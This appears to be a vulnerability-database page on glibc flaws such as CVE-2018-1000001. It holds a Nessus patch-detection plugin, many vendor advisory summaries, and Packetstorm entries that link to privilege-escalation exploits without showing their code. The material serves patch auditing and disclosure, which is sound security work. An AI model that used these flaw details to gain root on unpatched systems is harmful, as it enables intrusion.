title	Oracle Linux 7 : glibc (ELSA-2018-0805)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2018:0805 and # Oracle Linux Security Advisory ELSA-2018-0805 respectively. # include("compat.inc"); if (description) { script_id(109105); script_version("1.4"); script_cvs_date("Date: 2019/09/27 13:00:38"); script_cve_id("CVE-2014-9402", "CVE-2015-5180", "CVE-2017-12132", "CVE-2017-15670", "CVE-2017-15804", "CVE-2018-1000001"); script_xref(name:"RHSA", value:"2018:0805"); script_name(english:"Oracle Linux 7 : glibc (ELSA-2018-0805)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "From Red Hat Security Advisory 2018:0805 : An update for glibc is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. Security Fix(es) : * glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation (CVE-2018-1000001) * glibc: Buffer overflow in glob with GLOB_TILDE (CVE-2017-15670) * glibc: Buffer overflow during unescaping of user names with the ~ operator (CVE-2017-15804) * glibc: denial of service in getnetbyname function (CVE-2014-9402) * glibc: DNS resolver NULL pointer dereference with crafted record type (CVE-2015-5180) * glibc: Fragmentation attacks possible when EDNS0 is enabled (CVE-2017-12132) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank halfdog for reporting CVE-2018-1000001. The CVE-2015-5180 issue was discovered by Florian Weimer (Red Hat Product Security). Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.5 Release Notes linked from the References section." ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2018-April/007611.html" ); script_set_attribute( attribute:"solution", value:"Update the affected glibc packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc "realpath()" Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-headers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-static"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-utils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:nscd"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:7"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/24"); script_set_attribute(attribute:"patch_publication_date", value:"2018/04/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/18"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Oracle Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux"); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| !pregmatch(pattern: "Oracle (?:Linux Server\|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux"); os_ver = pregmatch(pattern: "Oracle (?:Linux Server\|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 7", "Oracle Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu); if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu); flag = 0; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"glibc-2.17-222.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"glibc-common-2.17-222.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"glibc-devel-2.17-222.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"glibc-headers-2.17-222.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"glibc-static-2.17-222.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"glibc-utils-2.17-222.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"nscd-2.17-222.el7")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc"); }

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2018-8E27AD96ED.NASL
description	This update addresses two security vulnerabilities : - CVE-2017-15670, CVE-2017-15671, CVE-2017-15804: Various vulnerabilities could lead to memory corruption in the `glob` and `glob64` function. (RHBZ#1505298, RHBZ##1504807) - CVE-2017-16997: Check for empty tokens before dynamic string token expansion in the dynamic linker, so that pre-existing privileged programs with `$ORIGIN` rpaths/runpaths do not cause the dynamic linker to search the current directory, potentially leading to privilege escalation. (RHBZ#1526866). - CVE-2018-1000001: `getcwd` would sometimes return a non-absolute path, confusing the `realpath` function, leading to privilege escalation in conjunction with user namespaces. (RHBZ#1533837) In addition, this update replaces the dynamic linker trampoline on x86-64 with a version which uses the `XSAVE` instruction if it is available. This improves compatibility with future hardware and compilers which do not follow the x86-64 ABI. This update also adjusts the thread stack size accounting to provide additional stack space compared to previous glibc versions (to avoid introducing RHBZ#1527887). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2018-01-24
plugin id	106281
published	2018-01-24
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106281
title	Fedora 26 : glibc (2018-8e27ad96ed)

NASL family	PhotonOS Local Security Checks
NASL id	PHOTONOS_PHSA-2018-1_0-0111_GLIBC.NASL
description	An update of the glibc package has been released.
last seen	2020-03-17
modified	2019-02-07
plugin id	121812
published	2019-02-07
reporter	This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/121812
title	Photon OS 1.0: Glibc PHSA-2018-1.0-0111

NASL family	Huawei Local Security Checks
NASL id	EULEROS_SA-2018-1047.NASL
description	According to the version of the glibc packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.(CVE-2018-1000001) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-05-06
modified	2018-02-13
plugin id	106775
published	2018-02-13
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106775
title	EulerOS 2.0 SP1 : glibc (EulerOS-SA-2018-1047)

NASL family	Huawei Local Security Checks
NASL id	EULEROS_SA-2018-1239.NASL
description	According to the version of the glibc packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability : - In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.(CVE-2018-1000001) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	117548
published	2018-09-18
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/117548
title	EulerOS Virtualization 2.5.0 : glibc (EulerOS-SA-2018-1239)

NASL family	CentOS Local Security Checks
NASL id	CENTOS_RHSA-2018-0805.NASL
description	An update for glibc is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. Security Fix(es) : * glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation (CVE-2018-1000001) * glibc: Buffer overflow in glob with GLOB_TILDE (CVE-2017-15670) * glibc: Buffer overflow during unescaping of user names with the ~ operator (CVE-2017-15804) * glibc: denial of service in getnetbyname function (CVE-2014-9402) * glibc: DNS resolver NULL pointer dereference with crafted record type (CVE-2015-5180) * glibc: Fragmentation attacks possible when EDNS0 is enabled (CVE-2017-12132) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank halfdog for reporting CVE-2018-1000001. The CVE-2015-5180 issue was discovered by Florian Weimer (Red Hat Product Security). Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.5 Release Notes linked from the References section.
last seen	2020-06-01
modified	2020-06-02
plugin id	109371
published	2018-04-27
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/109371
title	CentOS 7 : glibc (CESA-2018:0805)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2018-0451-1.NASL
description	This update for glibc fixes the following issues: Security issues fixed : - CVE-2017-8804: Fix memory leak after deserialization failure in xdr_bytes, xdr_string (bsc#1037930) - CVE-2017-12132: Reduce EDNS payload size to 1200 bytes (bsc#1051791) - CVE-2018-6485,CVE-2018-6551: Fix integer overflows in internal memalign and malloc functions (bsc#1079036) - CVE-2018-1000001: Avoid underflow of malloced area (bsc#1074293) Non security bugs fixed : - Release read lock after resetting timeout (bsc#1073990) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	106865
published	2018-02-16
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106865
title	SUSE SLED12 / SLES12 Security Update : glibc (SUSE-SU-2018:0451-1)

NASL family	PhotonOS Local Security Checks
NASL id	PHOTONOS_PHSA-2018-1_0-0111.NASL
description	An update of 'glibc' packages of Photon OS has been released.
last seen	2019-02-08
modified	2019-02-07
plugin id	111921
published	2018-08-17
reporter	Tenable
source	https://www.tenable.com/plugins/index.php?view=single&id=111921
title	Photon OS 1.0: Glibc PHSA-2018-1.0-0111 (deprecated)

NASL family	PhotonOS Local Security Checks
NASL id	PHOTONOS_PHSA-2018-2_0-0018_GLIBC.NASL
description	An update of the glibc package has been released.
last seen	2020-03-17
modified	2019-02-07
plugin id	121923
published	2019-02-07
reporter	This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/121923
title	Photon OS 2.0: Glibc PHSA-2018-2.0-0018

NASL family	PhotonOS Local Security Checks
NASL id	PHOTONOS_PHSA-2018-2_0-0018.NASL
description	An update of {'glibc'} packages of Photon OS has been released.
last seen	2019-02-08
modified	2019-02-07
plugin id	111288
published	2018-07-24
reporter	Tenable
source	https://www.tenable.com/plugins/index.php?view=single&id=111288
title	Photon OS 2.0 : glibc (PhotonOS-PHSA-2018-2.0-0018) (deprecated)

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2018-0805.NASL
description	An update for glibc is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. Security Fix(es) : * glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation (CVE-2018-1000001) * glibc: Buffer overflow in glob with GLOB_TILDE (CVE-2017-15670) * glibc: Buffer overflow during unescaping of user names with the ~ operator (CVE-2017-15804) * glibc: denial of service in getnetbyname function (CVE-2014-9402) * glibc: DNS resolver NULL pointer dereference with crafted record type (CVE-2015-5180) * glibc: Fragmentation attacks possible when EDNS0 is enabled (CVE-2017-12132) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank halfdog for reporting CVE-2018-1000001. The CVE-2015-5180 issue was discovered by Florian Weimer (Red Hat Product Security). Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.5 Release Notes linked from the References section.
last seen	2020-06-01
modified	2020-06-02
plugin id	108985
published	2018-04-11
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/108985
title	RHEL 7 : glibc (RHSA-2018:0805)

NASL family	Gentoo Local Security Checks
NASL id	GENTOO_GLSA-201804-02.NASL
description	The remote host is affected by the vulnerability described in GLSA-201804-02 (glibc: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in glibc. Please review the CVE identifiers referenced below for details. Impact : An attacker could possibly execute arbitrary code, escalate privileges, cause a Denial of Service condition, or have other unspecified impacts. Workaround : There is no known workaround at this time.
last seen	2020-06-01
modified	2020-06-02
plugin id	108822
published	2018-04-04
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/108822
title	GLSA-201804-02 : glibc: Multiple vulnerabilities

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2018-2187-1.NASL
description	This update for glibc fixes the following issues: Security issues fixed : - CVE-2017-15804: Fix buffer overflow during unescaping of user names in the glob function in glob.c (bsc#1064580). - CVE-2017-15670: Fix buffer overflow in glob with GLOB_TILDE (bsc#1064583). - CVE-2017-15671: Fix memory leak in glob with GLOB_TILDE (bsc#1064569). - CVE-2018-11236: Fix 32bit arch integer overflow in stdlib/canonicalize.c when processing very long pathname arguments (bsc#1094161). - CVE-2017-12132: Reduce advertised EDNS0 buffer size to guard against fragmentation attacks (bsc#1051791). - CVE-2018-1000001: Avoid underflow of malloced area (bsc#1074293). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	111547
published	2018-08-06
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/111547
title	SUSE SLES12 Security Update : glibc (SUSE-SU-2018:2187-1)

NASL family	Amazon Linux Local Security Checks
NASL id	ALA_ALAS-2018-1017.NASL
description	Fragmentation attacks possible when EDNS0 is enabled The DNS stub resolver in the GNU C Library (aka glibc or libc6) before version 2.26, when EDNS support is enabled, will solicit large UDP responses from name servers, potentially simplifying off-path DNS spoofing attacks due to IP fragmentation.(CVE-2017-12132) Buffer overflow in glob with GLOB_TILDE The GNU C Library (aka glibc or libc6) before 2.27 contains an off-by-one error leading to a heap-based buffer overflow in the glob function in glob.c, related to the processing of home directories using the ~ operator followed by a long string.(CVE-2017-15670) Denial of service in getnetbyname function The nss_dns implementation of getnetbyname in GNU C Library (aka glibc) before 2.21, when the DNS backend in the Name Service Switch configuration is enabled, allows remote attackers to cause a denial of service (infinite loop) by sending a positive answer while a network name is being process.(CVE-2014-9402) DNS resolver NULL pointer dereference with crafted record type res_query in libresolv in glibc before 2.25 allows remote attackers to cause a denial of service (NULL pointer dereference and process crash).(CVE-2015-5180) realpath() buffer underflow when getcwd() returns relative path allows privilege escalation In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.(CVE-2018-1000001) Buffer overflow during unescaping of user names with the ~ operator The glob function in glob.c in the GNU C Library (aka glibc or libc6) before 2.27 contains a buffer overflow during unescaping of user names with the ~ operator.(CVE-2017-15804)
last seen	2020-06-01
modified	2020-06-02
plugin id	109699
published	2018-05-11
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/109699
title	Amazon Linux AMI : glibc (ALAS-2018-1017)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2018-0075-1.NASL
description	This update for glibc fixes the following issues : - A privilege escalation bug in the realpath() function has been fixed. [CVE-2018-1000001, bsc#1074293] Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	106045
published	2018-01-15
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106045
title	SUSE SLES11 Security Update : glibc (SUSE-SU-2018:0075-1)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2018-0071-1.NASL
description	This update for glibc fixes the following issues : - A privilege escalation bug in the realpath() function has been fixed. [CVE-2018-1000001, bsc#1074293] Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	106041
published	2018-01-15
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106041
title	SUSE SLES12 Security Update : glibc (SUSE-SU-2018:0071-1)

NASL family	NewStart CGSL Local Security Checks
NASL id	NEWSTART_CGSL_NS-SA-2019-0024_GLIBC.NASL
description	The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has glibc packages installed that are affected by multiple vulnerabilities: - The GNU C Library (aka glibc or libc6) before 2.27 contains an off-by-one error leading to a heap-based buffer overflow in the glob function in glob.c, related to the processing of home directories using the ~ operator followed by a long string. (CVE-2017-15670) - The DNS stub resolver in the GNU C Library (aka glibc or libc6) before version 2.26, when EDNS support is enabled, will solicit large UDP responses from name servers, potentially simplifying off-path DNS spoofing attacks due to IP fragmentation. (CVE-2017-12132) - The glob function in glob.c in the GNU C Library (aka glibc or libc6) before 2.27 contains a buffer overflow during unescaping of user names with the ~ operator. (CVE-2017-15804) - res_query in libresolv in glibc before 2.25 allows remote attackers to cause a denial of service (NULL pointer dereference and process crash). (CVE-2015-5180) - The nss_dns implementation of getnetbyname in GNU C Library (aka glibc) before 2.21, when the DNS backend in the Name Service Switch configuration is enabled, allows remote attackers to cause a denial of service (infinite loop) by sending a positive answer while a network name is being process. (CVE-2014-9402) - In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution. (CVE-2018-1000001) - Stack-based buffer overflow in the getaddrinfo function in sysdeps/posix/getaddrinfo.c in the GNU C Library (aka glibc or libc6) allows remote attackers to cause a denial of service (crash) via vectors involving hostent conversion. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-4458. (CVE-2016-3706) Note that Nessus has not tested for this issue but has instead relied only on the application
last seen	2020-06-01
modified	2020-06-02
plugin id	127183
published	2019-08-12
reporter	This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/127183
title	NewStart CGSL CORE 5.04 / MAIN 5.04 : glibc Multiple Vulnerabilities (NS-SA-2019-0024)

NASL family	SuSE Local Security Checks
NASL id	OPENSUSE-2018-184.NASL
description	This update for glibc fixes the following issues : Security issues fixed : - CVE-2017-8804: Fix memory leak after deserialization failure in xdr_bytes, xdr_string (bsc#1037930) - CVE-2017-12132: Reduce EDNS payload size to 1200 bytes (bsc#1051791) - CVE-2018-6485,CVE-2018-6551: Fix integer overflows in internal memalign and malloc functions (bsc#1079036) - CVE-2018-1000001: Avoid underflow of malloced area (bsc#1074293) Non security bugs fixed : - Release read lock after resetting timeout (bsc#1073990) This update was imported from the SUSE:SLE-12-SP2:Update update project.
last seen	2020-06-05
modified	2018-02-21
plugin id	106916
published	2018-02-21
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106916
title	openSUSE Security Update : glibc (openSUSE-2018-184)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2018-0074-1.NASL
description	This update for glibc fixes the following issues : - A privilege escalation bug in the realpath() function has been fixed. [CVE-2018-1000001, bsc#1074293] - A memory leak and a buffer overflow in the dynamic ELF loader has been fixed. [CVE-2017-1000408, CVE-2017-1000409, bsc#1071319] - An issue in the code handling RPATHs was fixed that could have been exploited by an attacker to execute code loaded from arbitrary libraries. [CVE-2017-16997, bsc#1073231] - A potential crash caused by a use-after-free bug in pthread_create() has been fixed. [bsc#1053188] - A bug that prevented users to build shared objects which use the optimized libmvec.so API has been fixed. [bsc#1070905] - A memory leak in the glob() function has been fixed. [CVE-2017-15670, CVE-2017-15671, CVE-2017-15804, bsc#1064569, bsc#1064580, bsc#1064583] - A bug that would lose the syscall error code value in case of crashes has been fixed. [bsc#1063675] Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	106044
published	2018-01-15
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106044
title	SUSE SLED12 / SLES12 Security Update : glibc (SUSE-SU-2018:0074-1)

NASL family	Ubuntu Local Security Checks
NASL id	UBUNTU_USN-3534-1.NASL
description	It was discovered that the GNU C library did not properly handle all of the possible return values from the kernel getcwd(2) syscall. A local attacker could potentially exploit this to execute arbitrary code in setuid programs and gain administrative privileges. (CVE-2018-1000001) A memory leak was discovered in the _dl_init_paths() function in the GNU C library dynamic loader. A local attacker could potentially exploit this with a specially crafted value in the LD_HWCAP_MASK environment variable, in combination with CVE-2017-1000409 and another vulnerability on a system with hardlink protections disabled, in order to gain administrative privileges. (CVE-2017-1000408) A heap-based buffer overflow was discovered in the _dl_init_paths() function in the GNU C library dynamic loader. A local attacker could potentially exploit this with a specially crafted value in the LD_LIBRARY_PATH environment variable, in combination with CVE-2017-1000408 and another vulnerability on a system with hardlink protections disabled, in order to gain administrative privileges. (CVE-2017-1000409) An off-by-one error leading to a heap-based buffer overflow was discovered in the GNU C library glob() implementation. An attacker could potentially exploit this to cause a denial of service or execute arbitrary code via a maliciously crafted pattern. (CVE-2017-15670) A heap-based buffer overflow was discovered during unescaping of user names with the ~ operator in the GNU C library glob() implementation. An attacker could potentially exploit this to cause a denial of service or execute arbitrary code via a maliciously crafted pattern. (CVE-2017-15804) It was discovered that the GNU C library dynamic loader mishandles RPATH and RUNPATH containing $ORIGIN for privileged (setuid or AT_SECURE) programs. A local attacker could potentially exploit this by providing a specially crafted library in the current working directory in order to gain administrative privileges. (CVE-2017-16997) It was discovered that the GNU C library malloc() implementation could return a memory block that is too small if an attempt is made to allocate an object whose size is close to SIZE_MAX, resulting in a heap-based overflow. An attacker could potentially exploit this to cause a denial of service or execute arbitrary code. This issue only affected Ubuntu 17.10. (CVE-2017-17426). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	106134
published	2018-01-18
reporter	Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106134
title	Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : eglibc, glibc vulnerabilities (USN-3534-1)

NASL family	Huawei Local Security Checks
NASL id	EULEROS_SA-2019-1551.NASL
description	According to the versions of the glibc packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.(CVE-2018-11236) - An integer overflow vulnerability was found in hcreate() and hcreate_r() functions which could result in an out-of-bounds memory access. This could lead to application crash or, potentially, arbitrary code execution.(CVE-2015-8778) - A stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module.(CVE-2015-7547) - A flaw was found in the regular expression matching routines that process multibyte character input. If an application utilized the glibc regular expression matching mechanism, an attacker could provide specially-crafted input that, when processed, would cause the application to crash.(CVE-2013-0242) - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is glibc-side mitigation which blocks processing of LD_LIBRARY_PATH for programs running in secure-execution mode and reduces the number of allocations performed by the processing of LD_AUDIT, LD_PRELOAD, and LD_HWCAP_MASK, making successful exploitation of this issue more difficult.(CVE-2017-1000366) - The DNS stub resolver in the GNU C Library (aka glibc or libc6) before version 2.26, when EDNS support is enabled, will solicit large UDP responses from name servers, potentially simplifying off-path DNS spoofing attacks due to IP fragmentation.(CVE-2017-12132) - It was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service.(CVE-2014-8121) - Stack-based buffer overflow in the getaddrinfo function in sysdeps/posix/getaddrinfo.c in the GNU C Library (aka glibc or libc6) allows remote attackers to cause a denial of service (crash) via vectors involving hostent conversion. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-4458.(CVE-2016-3706) - In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.(CVE-2018-1000001) - Stack-based buffer overflow in string/strcoll_l.c in the GNU C Library (aka glibc or libc6) 2.17 and earlier allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long string that triggers a malloc failure and use of the alloca function.(CVE-2012-4424) - It was found that the dynamic loader did not sanitize the LD_POINTER_GUARD environment variable. An attacker could use this flaw to bypass the pointer guarding protection on set-user-ID or set-group-ID programs to execute arbitrary code with the permissions of the user running the application.(CVE-2015-8777) - The glob function in glob.c in the GNU C Library (aka glibc or libc6) before 2.27 contains a buffer overflow during unescaping of user names with the ~ operator.(CVE-2017-15804) - res_query in libresolv in glibc before 2.25 allows remote attackers to cause a denial of service (NULL pointer dereference and process crash).(CVE-2015-5180) - pt_chown in GNU C Library (aka glibc or libc6) before 2.18 does not properly check permissions for tty files, which allows local users to change the permission on the files and obtain access to arbitrary pseudo-terminals by leveraging a FUSE file system.(CVE-2013-2207) - A stack overflow flaw was found in glibc
last seen	2020-03-17
modified	2019-05-14
plugin id	125004
published	2019-05-14
reporter	This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/125004
title	EulerOS Virtualization 3.0.1.0 : glibc (EulerOS-SA-2019-1551)

Packetstorm

data source	https://packetstormsecurity.com/files/download/148173/glibc_realpath_priv_esc.rb.txt
id	PACKETSTORM:148173
last seen	2018-06-13
published	2018-06-12
reporter	halfdog
source	https://packetstormsecurity.com/files/148173/glibc-realpath-Privilege-Escalation.html
title	glibc 'realpath()' Privilege Escalation

data source	https://packetstormsecurity.com/files/download/145970/glibcgetcwd-escalate.txt
id	PACKETSTORM:145970
last seen	2018-01-19
published	2018-01-18
reporter	halfdog
